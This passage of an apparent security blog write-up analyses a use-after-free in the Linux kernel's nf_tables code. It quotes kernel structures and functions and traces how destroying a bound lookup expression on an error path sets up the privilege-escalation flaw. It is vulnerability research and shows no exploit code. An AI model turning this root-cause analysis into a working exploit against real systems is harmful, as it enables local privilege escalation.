 * 	@objtype: object type (see NFT_OBJECT_* definitions)
 * 	@size: maximum set size
 *	@field_len: length of each field in concatenation, bytes
 *	@field_count: number of concatenated fields in element
 *	@use: number of rules references to this set
 * 	@nelems: number of elements
 * 	@ndeact: number of deactivated elements queued for removal
 *	@timeout: default timeout value in jiffies
 * 	@gc_int: garbage collection interval in msecs
 *	@policy: set parameterization (see enum nft_set_policies)
 *	@udlen: user data length
 *	@udata: user data
 *	@expr: stateful expression
 * 	@ops: set ops
 * 	@flags: set flags
 *	@genmask: generation mask
 * 	@klen: key length
 * 	@dlen: data length
 * 	@data: private set data
 */</span>
<span class="k">struct</span> <span class="n">nft_set</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">list_head</span>		<span class="n">list</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">list_head</span>		<span class="n">bindings</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_table</span>		<span class="o">*</span><span class="n">table</span><span class="p">;</span>
	<span class="n">possible_net_t</span>			<span class="n">net</span><span class="p">;</span>
	<span class="kt">char</span>				<span class="o">*</span><span class="n">name</span><span class="p">;</span>
	<span class="n">u64</span>				<span class="n">handle</span><span class="p">;</span>
	<span class="n">u32</span>				<span class="n">ktype</span><span class="p">;</span>
	<span class="n">u32</span>				<span class="n">dtype</span><span class="p">;</span>
	<span class="n">u32</span>				<span class="n">objtype</span><span class="p">;</span>
	<span class="n">u32</span>				<span class="n">size</span><span class="p">;</span>
	<span class="n">u8</span>				<span class="n">field_len</span><span class="p">[</span><span class="n">NFT_REG32_COUNT</span><span class="p">];</span>
	<span class="n">u8</span>				<span class="n">field_count</span><span class="p">;</span>
	<span class="n">u32</span>				<span class="n">use</span><span class="p">;</span>
	<span class="n">atomic_t</span>			<span class="n">nelems</span><span class="p">;</span>
	<span class="n">u32</span>				<span class="n">ndeact</span><span class="p">;</span>
	<span class="n">u64</span>				<span class="n">timeout</span><span class="p">;</span>
	<span class="n">u32</span>				<span class="n">gc_int</span><span class="p">;</span>
	<span class="n">u16</span>				<span class="n">policy</span><span class="p">;</span>
	<span class="n">u16</span>				<span class="n">udlen</span><span class="p">;</span>
	<span class="kt">unsigned</span> <span class="kt">char</span>			<span class="o">*</span><span class="n">udata</span><span class="p">;</span>
	<span class="cm">/* runtime data below here */</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_ops</span>	<span class="o">*</span><span class="n">ops</span> <span class="n">____cacheline_aligned</span><span class="p">;</span>
	<span class="n">u16</span>				<span class="n">flags</span><span class="o">:</span><span class="mi">14</span><span class="p">,</span>
					<span class="nl">genmask:</span><span class="mi">2</span><span class="p">;</span>
	<span class="n">u8</span>				<span class="n">klen</span><span class="p">;</span>
	<span class="n">u8</span>				<span class="n">dlen</span><span class="p">;</span>
	<span class="n">u8</span>				<span class="n">num_exprs</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_expr</span>			<span class="o">*</span><span class="n">exprs</span><span class="p">[</span><span class="n">NFT_SET_EXPR_MAX</span><span class="p">];</span>
	<span class="k">struct</span> <span class="n">list_head</span>		<span class="n">catchall_list</span><span class="p">;</span>
	<span class="kt">unsigned</span> <span class="kt">char</span>			<span class="n">data</span><span class="p">[]</span>
		<span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="n">__alignof__</span><span class="p">(</span><span class="n">u64</span><span class="p">))));</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Two things are important to note here: expressions can be attached to a set through <code class="language-plaintext highlighter-rouge">exprs</code>, and the set keeps a <code class="language-plaintext highlighter-rouge">bindings</code> linked list.</p>

<h3 id="lookup-expression-">Lookup Expression <a name="lookup"></a></h3>
<p>We already mentioned the existence of the <code class="language-plaintext highlighter-rouge">nft_lookup</code> expression… But what does it do?
The <strong>lookup</strong> expression is used to perform <em>lookups</em> into sets to check if a key or a value is present in the set.</p>

<p>Essentially in the example we provided after you set up your set with ports on which you want to drop packets, you will set up a lookup expression to perform the check on the incoming packets.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_lookup</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">nft_set</span>			<span class="o">*</span><span class="n">set</span><span class="p">;</span>
	<span class="n">u8</span>				<span class="n">sreg</span><span class="p">;</span>
	<span class="n">u8</span>				<span class="n">dreg</span><span class="p">;</span>
	<span class="n">bool</span>				<span class="n">invert</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">nft_set_binding</span>		<span class="n">binding</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The parameter <code class="language-plaintext highlighter-rouge">set</code> holds a pointer to the set in which the lookup is going to be performed. <code class="language-plaintext highlighter-rouge">sreg</code> holds the register index where the <strong>key</strong> that we are looking up is going to be loaded from and <code class="language-plaintext highlighter-rouge">dreg</code> is the register index where <strong>value</strong> will be stored after the lookup if the key exists.
The final member is <code class="language-plaintext highlighter-rouge">binding</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_set_binding</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">list_head</span>		<span class="n">list</span><span class="p">;</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">nft_chain</span>		<span class="o">*</span><span class="n">chain</span><span class="p">;</span>
	<span class="n">u32</span>				<span class="n">flags</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Each lookup expression has a binding which contains a pointer to the <code class="language-plaintext highlighter-rouge">nft_chain</code> to which it belongs (if it belongs to a chain). The binding also embeds a <code class="language-plaintext highlighter-rouge">list_head</code>. All of the expressions that look up into a set are in a linked list with each other (and the <em>set</em>) through their <code class="language-plaintext highlighter-rouge">binding</code> member (and the set’s <code class="language-plaintext highlighter-rouge">bindings</code> member).</p>

<p>So if we have two lookup expressions <code class="language-plaintext highlighter-rouge">lookup1</code> and <code class="language-plaintext highlighter-rouge">lookup2</code> that look up into a set called <code class="language-plaintext highlighter-rouge">set1</code> they would all be in a linked list.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* In case needed for clarity:
set1.bindings.next = lookup1.binding
lookup1.binding.next = lookup2.binding
lookup2.binding.next = set1.bindings

lookup2.binding.prev = lookup1.binding
lookup1.binding.prev = set1.bindings
set1.bindings.prev = lookup2.binding
*/</span>
</code></pre></div></div>
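<p>The linkage above can be reproduced in user space. The following is a minimal sketch, not kernel code: <code class="language-plaintext highlighter-rouge">list_init</code>, <code class="language-plaintext highlighter-rouge">list_add_tail</code>, <code class="language-plaintext highlighter-rouge">list_count</code>, <code class="language-plaintext highlighter-rouge">set_model</code>, <code class="language-plaintext highlighter-rouge">lookup_model</code> and <code class="language-plaintext highlighter-rouge">bind_two_lookups</code> are hypothetical stand-ins, and each binding is reduced to a bare <code class="language-plaintext highlighter-rouge">list_head</code>.</p>

```c
#include <assert.h>
#include <stddef.h>

/* Minimal user-space stand-in for the kernel's struct list_head. */
struct list_head {
    struct list_head *next, *prev;
};

/* Hypothetical, heavily trimmed stand-ins for nft_set and nft_lookup. */
struct set_model    { struct list_head bindings; };
struct lookup_model { struct list_head binding;  };

/* An empty list is a head that points at itself. */
static void list_init(struct list_head *head)
{
    head->next = head;
    head->prev = head;
}

/* Insert node right before head, i.e. at the tail of the list. */
static void list_add_tail(struct list_head *node, struct list_head *head)
{
    assert(node != head);
    node->prev = head->prev;
    node->next = head;
    head->prev->next = node;
    head->prev = node;
}

/* Count the entries reachable from head (the head itself is not counted). */
static size_t list_count(const struct list_head *head)
{
    size_t n = 0;

    for (const struct list_head *p = head->next; p != head; p = p->next)
        n++;
    return n;
}

/* Build the set1 / lookup1 / lookup2 list described in the comment above. */
static void bind_two_lookups(struct set_model *set1,
                             struct lookup_model *lookup1,
                             struct lookup_model *lookup2)
{
    list_init(&set1->bindings);
    list_add_tail(&lookup1->binding, &set1->bindings);
    list_add_tail(&lookup2->binding, &set1->bindings);
}
```

<p>After <code class="language-plaintext highlighter-rouge">bind_two_lookups(&amp;set1, &amp;lookup1, &amp;lookup2)</code>, following <code class="language-plaintext highlighter-rouge">next</code> from <code class="language-plaintext highlighter-rouge">set1.bindings</code> visits <code class="language-plaintext highlighter-rouge">lookup1.binding</code>, then <code class="language-plaintext highlighter-rouge">lookup2.binding</code>, and then arrives back at the set.</p>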

<h2 id="the-vulnerability-">The Vulnerability <a name="vulnerability"></a></h2>
<blockquote>
  <p>A use-after-free vulnerability was found in the Linux kernel’s Netfilter subsystem in net/netfilter/nf_tables_api.c. This flaw allows a local attacker with user access to cause a privilege escalation issue.</p>
</blockquote>

<h3 id="root-cause-">Root Cause <a name="rootcause"></a></h3>
<p>The problem arises when we add an <code class="language-plaintext highlighter-rouge">nft_lookup</code> expression to a set. To add an expression to a set, you send an <code class="language-plaintext highlighter-rouge">NFT_MSG_NEWSET</code> message, whose callback is the function <code class="language-plaintext highlighter-rouge">nf_tables_newset</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nf_tables_newset
	nft_set_elem_expr_alloc
		nft_expr_init
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">nf_tables_newset</code> calls <code class="language-plaintext highlighter-rouge">nft_set_elem_expr_alloc</code> which calls <code class="language-plaintext highlighter-rouge">nft_expr_init</code>.</p>

<p>Let’s take a deeper look at the <code class="language-plaintext highlighter-rouge">nft_expr_init</code> function.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="nf">nft_expr_init</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                      <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">nla</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">nft_expr_info</span> <span class="n">expr_info</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">module</span> <span class="o">*</span><span class="n">owner</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

    <span class="n">err</span> <span class="o">=</span> <span class="n">nf_tables_expr_parse</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">nla</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">expr_info</span><span class="p">);</span> 
    <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
        <span class="k">goto</span> <span class="n">err1</span><span class="p">;</span>

    <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
    <span class="n">expr</span> <span class="o">=</span> <span class="n">kzalloc</span><span class="p">(</span><span class="n">expr_info</span><span class="p">.</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">size</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span> <span class="c1">// GFP_KERNEL space </span>
    <span class="k">if</span> <span class="p">(</span><span class="n">expr</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
        <span class="k">goto</span> <span class="n">err2</span><span class="p">;</span>

    <span class="n">err</span> <span class="o">=</span> <span class="n">nf_tables_newexpr</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">expr_info</span><span class="p">,</span> <span class="n">expr</span><span class="p">);</span> <span class="c1">// [1]</span>
    <span class="c1">// if the full initialization of the expression failed</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> 
        <span class="k">goto</span> <span class="n">err3</span><span class="p">;</span> <span class="c1">// free *expr</span>

    <span class="k">return</span> <span class="n">expr</span><span class="p">;</span>
<span class="nl">err3:</span>
    <span class="n">kfree</span><span class="p">(</span><span class="n">expr</span><span class="p">);</span>
<span class="nl">err2:</span>
    <span class="n">owner</span> <span class="o">=</span> <span class="n">expr_info</span><span class="p">.</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">owner</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">expr_info</span><span class="p">.</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">release_ops</span><span class="p">)</span>
        <span class="n">expr_info</span><span class="p">.</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">release_ops</span><span class="p">(</span><span class="n">expr_info</span><span class="p">.</span><span class="n">ops</span><span class="p">);</span>

    <span class="n">module_put</span><span class="p">(</span><span class="n">owner</span><span class="p">);</span>
<span class="nl">err1:</span>
    <span class="k">return</span> <span class="n">ERR_PTR</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>At <code class="language-plaintext highlighter-rouge">[1]</code> it calls the function <code class="language-plaintext highlighter-rouge">nf_tables_newexpr</code> to fully initialize the expression. If that fails, it frees the expression.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nf_tables_newexpr</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                 <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_info</span> <span class="o">*</span><span class="n">expr_info</span><span class="p">,</span>
                 <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_ops</span> <span class="o">*</span><span class="n">ops</span> <span class="o">=</span> <span class="n">expr_info</span><span class="o">-&gt;</span><span class="n">ops</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

    <span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">=</span> <span class="n">ops</span><span class="p">;</span> <span class="c1">// sets the ops of the expression to those expr_info-&gt;ops;</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">init</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// expression-specific initialization</span>
        <span class="n">err</span> <span class="o">=</span> <span class="n">ops</span><span class="o">-&gt;</span><span class="n">init</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">expr</span><span class="p">,</span> <span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">**</span><span class="p">)</span><span class="n">expr_info</span><span class="o">-&gt;</span><span class="n">tb</span><span class="p">);</span> <span class="c1">// [2]</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
            <span class="k">goto</span> <span class="n">err1</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="nl">err1:</span>
    <span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="k">return</span> <span class="n">err</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>At <code class="language-plaintext highlighter-rouge">[2]</code> we see that the expression-specific <code class="language-plaintext highlighter-rouge">ops-&gt;init</code> function gets called, and if it fails the error is returned to the caller - <code class="language-plaintext highlighter-rouge">nft_expr_init</code>.
Each type of expression has its own <code class="language-plaintext highlighter-rouge">nft_expr_ops</code> defined. Let’s take a look at the <code class="language-plaintext highlighter-rouge">ops</code> of the lookup expression, since that is the expression we care about.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_ops</span> <span class="n">nft_lookup_ops</span> <span class="o">=</span> <span class="p">{</span>
	<span class="p">.</span><span class="n">type</span>		<span class="o">=</span> <span class="o">&amp;</span><span class="n">nft_lookup_type</span><span class="p">,</span>
	<span class="p">.</span><span class="n">size</span>		<span class="o">=</span> <span class="n">NFT_EXPR_SIZE</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_lookup</span><span class="p">)),</span>
	<span class="p">.</span><span class="n">eval</span>		<span class="o">=</span> <span class="n">nft_lookup_eval</span><span class="p">,</span>
	<span class="p">.</span><span class="n">init</span>		<span class="o">=</span> <span class="n">nft_lookup_init</span><span class="p">,</span>
	<span class="p">.</span><span class="n">activate</span>	<span class="o">=</span> <span class="n">nft_lookup_activate</span><span class="p">,</span>
	<span class="p">.</span><span class="n">deactivate</span>	<span class="o">=</span> <span class="n">nft_lookup_deactivate</span><span class="p">,</span>
	<span class="p">.</span><span class="n">destroy</span>	<span class="o">=</span> <span class="n">nft_lookup_destroy</span><span class="p">,</span>
	<span class="p">.</span><span class="n">dump</span>		<span class="o">=</span> <span class="n">nft_lookup_dump</span><span class="p">,</span>
	<span class="p">.</span><span class="n">validate</span>	<span class="o">=</span> <span class="n">nft_lookup_validate</span><span class="p">,</span>
	<span class="p">.</span><span class="n">reduce</span>		<span class="o">=</span> <span class="n">nft_lookup_reduce</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Here we can see that <code class="language-plaintext highlighter-rouge">ops-&gt;init</code> of the lookup expression is <code class="language-plaintext highlighter-rouge">nft_lookup_init</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nft_lookup_init</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
               <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">,</span>
               <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span> <span class="k">const</span> <span class="n">tb</span><span class="p">[])</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">nft_lookup</span> <span class="o">*</span><span class="n">priv</span> <span class="o">=</span> <span class="n">nft_expr_priv</span><span class="p">(</span><span class="n">expr</span><span class="p">);</span> 
    <span class="n">u8</span> <span class="n">genmask</span> <span class="o">=</span> <span class="n">nft_genmask_next</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">);</span>
    <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">;</span>
    <span class="n">u32</span> <span class="n">flags</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">tb</span><span class="p">[</span><span class="n">NFTA_LOOKUP_SET</span><span class="p">]</span> <span class="o">==</span> <span class="nb">NULL</span> <span class="o">||</span>
        <span class="n">tb</span><span class="p">[</span><span class="n">NFTA_LOOKUP_SREG</span><span class="p">]</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
        <span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>

    <span class="c1">// looks up the target set by name or ID</span>
    <span class="n">set</span> <span class="o">=</span> <span class="n">nft_set_lookup_global</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">ctx</span><span class="o">-&gt;</span><span class="n">table</span><span class="p">,</span> <span class="n">tb</span><span class="p">[</span><span class="n">NFTA_LOOKUP_SET</span><span class="p">],</span>
                    <span class="n">tb</span><span class="p">[</span><span class="n">NFTA_LOOKUP_SET_ID</span><span class="p">],</span> <span class="n">genmask</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">set</span><span class="p">))</span>
        <span class="k">return</span> <span class="n">PTR_ERR</span><span class="p">(</span><span class="n">set</span><span class="p">);</span>

    <span class="p">...</span>
    <span class="c1">// records whether the set is a map</span>
    <span class="n">priv</span><span class="o">-&gt;</span><span class="n">binding</span><span class="p">.</span><span class="n">flags</span> <span class="o">=</span> <span class="n">set</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_SET_MAP</span><span class="p">;</span>

    <span class="c1">// attempts to bind the expression to the set</span>
    <span class="n">err</span> <span class="o">=</span> <span class="n">nf_tables_bind_set</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">priv</span><span class="o">-&gt;</span><span class="n">binding</span><span class="p">);</span> <span class="c1">// [1]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">err</span><span class="p">;</span>

    <span class="n">priv</span><span class="o">-&gt;</span><span class="n">set</span> <span class="o">=</span> <span class="n">set</span><span class="p">;</span> 
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">nf_tables_bind_set</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
               <span class="k">struct</span> <span class="n">nft_set_binding</span> <span class="o">*</span><span class="n">binding</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">nft_set_binding</span> <span class="o">*</span><span class="n">i</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">nft_set_iter</span> <span class="n">iter</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">use</span> <span class="o">==</span> <span class="n">UINT_MAX</span><span class="p">)</span>
        <span class="k">return</span> <span class="o">-</span><span class="n">EOVERFLOW</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">bindings</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">nft_set_is_anonymous</span><span class="p">(</span><span class="n">set</span><span class="p">))</span>
        <span class="k">return</span> <span class="o">-</span><span class="n">EBUSY</span><span class="p">;</span>

    <span class="p">...</span>

<span class="nl">bind:</span>                          
    <span class="n">binding</span><span class="o">-&gt;</span><span class="n">chain</span> <span class="o">=</span> <span class="n">ctx</span><span class="o">-&gt;</span><span class="n">chain</span><span class="p">;</span>
    <span class="n">list_add_tail_rcu</span><span class="p">(</span><span class="o">&amp;</span><span class="n">binding</span><span class="o">-&gt;</span><span class="n">list</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">bindings</span><span class="p">);</span>
    <span class="n">nft_set_trans_bind</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">);</span>
    <span class="n">set</span><span class="o">-&gt;</span><span class="n">use</span><span class="o">++</span><span class="p">;</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>At <code class="language-plaintext highlighter-rouge">[1]</code> we can see that it calls the function <code class="language-plaintext highlighter-rouge">nf_tables_bind_set</code> to bind the expression to the set. In <code class="language-plaintext highlighter-rouge">nf_tables_bind_set</code> we can see that it fails with <code class="language-plaintext highlighter-rouge">-EBUSY</code> if the set is anonymous and already has a binding. So for the binding to reliably succeed, the set that we are performing the <strong>lookup</strong> on shouldn’t be anonymous.</p>
<blockquote>
  <p>If we want a set to be non-anonymous we can just not set the anonymous flag when creating it.</p>
</blockquote>

<p>We already established that when adding an expression to a set the <code class="language-plaintext highlighter-rouge">nft_expr_init</code> function gets called by <code class="language-plaintext highlighter-rouge">nft_set_elem_expr_alloc</code>. Let’s take a look at it.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="nf">nft_set_elem_expr_alloc</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                     <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
                     <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">attr</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

    <span class="n">expr</span> <span class="o">=</span> <span class="n">nft_expr_init</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">attr</span><span class="p">);</span> <span class="c1">// [1]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">expr</span><span class="p">))</span>
        <span class="k">return</span> <span class="n">expr</span><span class="p">;</span>

    <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EOPNOTSUPP</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_EXPR_STATEFUL</span><span class="p">))</span> <span class="c1">// [2]</span>
        <span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_EXPR_GC</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_SET_TIMEOUT</span><span class="p">)</span>
            <span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">gc_init</span><span class="p">)</span>
            <span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>
        <span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">gc_init</span><span class="p">(</span><span class="n">set</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">expr</span><span class="p">;</span>

<span class="nl">err_set_elem_expr:</span>
    <span class="n">nft_expr_destroy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">expr</span><span class="p">);</span> <span class="c1">// [3]</span>
    <span class="k">return</span> <span class="n">ERR_PTR</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">nft_expr_destroy</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">nf_tables_expr_destroy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">expr</span><span class="p">);</span>
    <span class="n">kfree</span><span class="p">(</span><span class="n">expr</span><span class="p">);</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">void</span> <span class="nf">nf_tables_expr_destroy</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                   <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_type</span> <span class="o">*</span><span class="n">type</span> <span class="o">=</span> <span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">destroy</span><span class="p">)</span>
        <span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">destroy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">expr</span><span class="p">);</span> <span class="c1">// [4]</span>
    <span class="n">module_put</span><span class="p">(</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">owner</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
